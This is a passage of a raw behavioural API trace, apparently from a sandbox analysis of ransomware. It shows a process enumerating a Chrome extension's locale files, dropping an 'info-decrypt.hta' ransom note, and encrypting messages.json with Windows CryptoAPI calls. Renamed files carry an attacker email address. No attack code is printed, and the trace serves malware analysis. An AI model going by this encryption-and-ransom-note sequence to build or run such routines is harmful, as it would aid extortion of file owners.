data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0210.406] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ea4c) returned 1 [0210.407] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs", nBufferLength=0x105, lpBuffer=0x949e554, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs", lpFilePart=0x0) returned 0x89 [0210.407] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\", nBufferLength=0x105, lpBuffer=0x949e528, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\", lpFilePart=0x0) returned 0x8a [0210.407] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\*", lpFindFileData=0x949e774 | out: lpFindFileData=0x949e774*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f490 [0210.407] FindNextFileW (in: hFindFile=0xb7f490, lpFindFileData=0x949e784 | out: lpFindFileData=0x949e784*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0210.408] FindNextFileW (in: hFindFile=0xb7f490, lpFindFileData=0x949e784 | out: lpFindFileData=0x949e784*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bc4d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe0, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0210.408] FindNextFileW (in: hFindFile=0xb7f490, lpFindFileData=0x949e784 | out: lpFindFileData=0x949e784*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0210.408] FindClose (in: hFindFile=0xb7f490 | out: hFindFile=0xb7f490) returned 1 [0210.408] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea0c) returned 1 [0210.408] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea18) returned 1 [0210.408] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ea4c) returned 1 [0210.408] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs", nBufferLength=0x105, lpBuffer=0x949e554, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs", lpFilePart=0x0) returned 0x89 [0210.408] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\", nBufferLength=0x105, lpBuffer=0x949e528, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\", lpFilePart=0x0) returned 0x8a [0210.408] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\*", lpFindFileData=0x949e774 | out: lpFindFileData=0x949e774*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f490 [0210.409] FindNextFileW (in: hFindFile=0xb7f490, lpFindFileData=0x949e784 | out: lpFindFileData=0x949e784*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0210.409] FindNextFileW (in: hFindFile=0xb7f490, lpFindFileData=0x949e784 | out: lpFindFileData=0x949e784*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bc4d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe0, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0210.409] FindNextFileW (in: hFindFile=0xb7f490, lpFindFileData=0x949e784 | out: lpFindFileData=0x949e784*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bc4d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe0, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0210.409] FindClose (in: hFindFile=0xb7f490 | out: hFindFile=0xb7f490) returned 1 [0210.409] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea0c) returned 1 [0210.410] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea18) returned 1 [0210.410] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json", nBufferLength=0x105, lpBuffer=0x949e4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json", lpFilePart=0x0) returned 0x97 [0210.410] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x949e4c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\info-decrypt.hta", lpFilePart=0x0) returned 0x9a [0210.410] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e928) returned 1 [0210.410] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\info-decrypt.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x949e9a4 | out: lpFileInformation=0x949e9a4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0210.410] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e924) returned 1 [0210.410] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json", nBufferLength=0x105, lpBuffer=0x949e4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json", lpFilePart=0x0) returned 0x97 [0210.410] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x949e368, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\info-decrypt.hta", lpFilePart=0x0) returned 0x9a [0210.410] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e85c) returned 1 [0210.410] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\info-decrypt.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x31c [0210.411] GetFileType (hFile=0x31c) returned 0x1 [0210.411] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e858) returned 1 [0210.411] GetFileType (hFile=0x31c) returned 0x1 [0210.411] WriteFile (in: hFile=0x31c, lpBuffer=0x3795dbc*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x949e920, lpOverlapped=0x0 | out: lpBuffer=0x3795dbc*, lpNumberOfBytesWritten=0x949e920*=0x1000, lpOverlapped=0x0) returned 1 [0210.413] WriteFile (in: hFile=0x31c, lpBuffer=0x3795dbc*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x949e8f4, lpOverlapped=0x0 | out: lpBuffer=0x3795dbc*, lpNumberOfBytesWritten=0x949e8f4*=0x55e, lpOverlapped=0x0) returned 1 [0210.413] CloseHandle (hObject=0x31c) returned 1 [0210.414] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json", nBufferLength=0x105, lpBuffer=0x949e4c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json", lpFilePart=0x0) returned 0x97 [0210.414] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e974) returned 1 [0210.414] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json"), fInfoLevelId=0x0, lpFileInformation=0x3796dd8 | out: lpFileInformation=0x3796dd8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bc4d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe0)) returned 1 [0211.194] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e970) returned 1 [0211.194] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json", nBufferLength=0x105, lpBuffer=0x949e3b4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json", lpFilePart=0x0) returned 0x97 [0211.194] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e8a8) returned 1 [0211.194] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x32c [0211.195] GetFileType (hFile=0x32c) returned 0x1 [0211.195] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e8a4) returned 1 [0211.195] GetFileType (hFile=0x32c) returned 0x1 [0211.195] GetFileSize (in: hFile=0x32c, lpFileSizeHigh=0x949e9b0 | out: lpFileSizeHigh=0x949e9b0*=0x0) returned 0xe0 [0211.195] ReadFile (in: hFile=0x32c, lpBuffer=0x37ab0b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x949e95c, lpOverlapped=0x0 | out: lpBuffer=0x37ab0b8*, lpNumberOfBytesRead=0x949e95c*=0xe0, lpOverlapped=0x0) returned 1 [0211.196] CloseHandle (hObject=0x32c) returned 1 [0211.196] CryptAcquireContextW (in: phProv=0x949e8fc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x949e8fc*=0xbdf480) returned 1 [0211.197] CryptGenRandom (in: hProv=0xbdf480, dwLen=0x10, pbBuffer=0x37ac40c | out: pbBuffer=0x37ac40c) returned 1 [0211.426] CryptImportKey (in: hProv=0xbdf480, pbData=0x36ccddc, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x949e8cc | out: phKey=0x949e8cc*=0xb7f110) returned 1 [0211.426] CryptContextAddRef (hProv=0xbdf480, pdwReserved=0x0, dwFlags=0x0) returned 1 [0211.426] CryptContextAddRef (hProv=0xbdf480, pdwReserved=0x0, dwFlags=0x0) returned 1 [0211.426] CryptDuplicateKey (in: hKey=0xb7f110, pdwReserved=0x0, dwFlags=0x0, phKey=0x949e8bc | out: phKey=0x949e8bc*=0xb7f890) returned 1 [0211.426] CryptContextAddRef (hProv=0xbdf480, pdwReserved=0x0, dwFlags=0x0) returned 1 [0211.426] CryptSetKeyParam (hKey=0xb7f890, dwParam=0x4, pbData=0x36ccebc*=0x1, dwFlags=0x0) returned 1 [0211.426] CryptSetKeyParam (hKey=0xb7f890, dwParam=0x1, pbData=0x36cce88, dwFlags=0x0) returned 1 [0211.426] CryptEncrypt (in: hKey=0xb7f890, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x36ccecc*, pdwDataLen=0x949e928*=0xf0, dwBufLen=0xf0 | out: pbData=0x36ccecc*, pdwDataLen=0x949e928*=0xf0) returned 1 [0211.427] CryptEncrypt (in: hKey=0xb7f890, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x36ccfe0*, pdwDataLen=0x949e930*=0x0, dwBufLen=0x10 | out: pbData=0x36ccfe0*, pdwDataLen=0x949e930*=0x10) returned 1 [0211.428] CryptDestroyKey (hKey=0xb7f110) returned 1 [0211.428] CryptReleaseContext (hProv=0xbdf480, dwFlags=0x0) returned 1 [0211.428] CryptReleaseContext (hProv=0xbdf480, dwFlags=0x0) returned 1 [0211.428] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json", nBufferLength=0x105, lpBuffer=0x949e3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json", lpFilePart=0x0) returned 0x97 [0211.428] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e894) returned 1 [0211.428] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x320 [0211.611] GetFileType (hFile=0x320) returned 0x1 [0211.615] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e890) returned 1 [0211.615] GetFileType (hFile=0x320) returned 0x1 [0211.615] WriteFile (in: hFile=0x320, lpBuffer=0x36cd6a8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x949e924, lpOverlapped=0x0 | out: lpBuffer=0x36cd6a8*, lpNumberOfBytesWritten=0x949e924*=0x20, lpOverlapped=0x0) returned 1 [0211.701] CloseHandle (hObject=0x320) returned 1 [0211.702] CoTaskMemAlloc (cb=0x20c) returned 0x66cdfc8 [0211.702] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x66cdfc8 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0211.702] CoTaskMemFree (pv=0x66cdfc8) [0211.702] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x949e388, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0211.702] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e8d0 | out: ppv=0x949e8d0*=0xb51e34) returned 0x0 [0211.702] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949e8c8 | out: pAptType=0x949e8c8*=1) returned 0x0 [0211.702] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949e8cc | out: ppvObject=0x949e8cc*=0x0) returned 0x80004002 [0211.702] IUnknown:Release (This=0xb51e34) returned 0x1 [0211.703] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e238 | out: ppv=0x949e238*=0x60273a0) returned 0x0 [0211.703] WbemDefPath:IUnknown:QueryInterface (in: This=0x60273a0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e450 | out: ppvObject=0x949e450*=0x0) returned 0x80004002 [0211.703] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60273a0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e464 | out: ppvObject=0x949e464*=0x602a1b0) returned 0x0 [0211.703] WbemDefPath:IUnknown:Release (This=0x60273a0) returned 0x0 [0211.704] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a1b0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e084 | out: ppvObject=0x949e084*=0x602a1b0) returned 0x0 [0211.704] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a1b0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e040 | out: ppvObject=0x949e040*=0x0) returned 0x80004002 [0211.704] WbemDefPath:IUnknown:AddRef (This=0x602a1b0) returned 0x3 [0211.704] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a1b0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949d99c | out: ppvObject=0x949d99c*=0x0) returned 0x80004002 [0211.704] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a1b0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949d94c | out: ppvObject=0x949d94c*=0x0) returned 0x80004002 [0211.704] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a1b0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949d958 | out: ppvObject=0x949d958*=0x66ce338) returned 0x0 [0211.704] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ce338, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949d960 | out: pCid=0x949d960*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0211.704] WbemDefPath:IUnknown:Release (This=0x66ce338) returned 0x3 [0211.704] CoGetContextToken (in: pToken=0x949d9b8 | out: pToken=0x949d9b8) returned 0x0 [0211.704] CoGetContextToken (in: pToken=0x949ddc0 | out: pToken=0x949ddc0) returned 0x0 [0211.704] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a1b0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949de50 | out: ppvObject=0x949de50*=0x0) returned 0x80004002 [0211.704] WbemDefPath:IUnknown:Release (This=0x602a1b0) returned 0x2 [0211.704] WbemDefPath:IUnknown:Release (This=0x602a1b0) returned 0x1 [0211.704] CoGetContextToken (in: pToken=0x949e748 | out: pToken=0x949e748) returned 0x0 [0211.704] CoGetContextToken (in: pToken=0x949e6a8 | out: pToken=0x949e6a8) returned 0x0 [0211.704] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a1b0, riid=0x949e778*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x949e774 | out: ppvObject=0x949e774*=0x602a1b0) returned 0x0 [0211.704] WbemDefPath:IUnknown:AddRef (This=0x602a1b0) returned 0x3 [0211.704] WbemDefPath:IUnknown:Release (This=0x602a1b0) returned 0x2 [0211.704] WbemDefPath:IWbemPath:SetText (This=0x602a1b0, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0211.704] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x602a1b0, puCount=0x949e8fc | out: puCount=0x949e8fc*=0x0) returned 0x0 [0211.704] WbemDefPath:IWbemPath:GetText (in: This=0x602a1b0, lFlags=2, puBuffLength=0x949e8f8*=0x0, pszText=0x0 | out: puBuffLength=0x949e8f8*=0x20, pszText=0x0) returned 0x0 [0211.704] WbemDefPath:IWbemPath:GetText (in: This=0x602a1b0, lFlags=2, puBuffLength=0x949e8f8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949e8f8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0211.704] WbemDefPath:IWbemPath:GetInfo (in: This=0x602a1b0, uRequestedInfo=0x0, puResponse=0x949e904 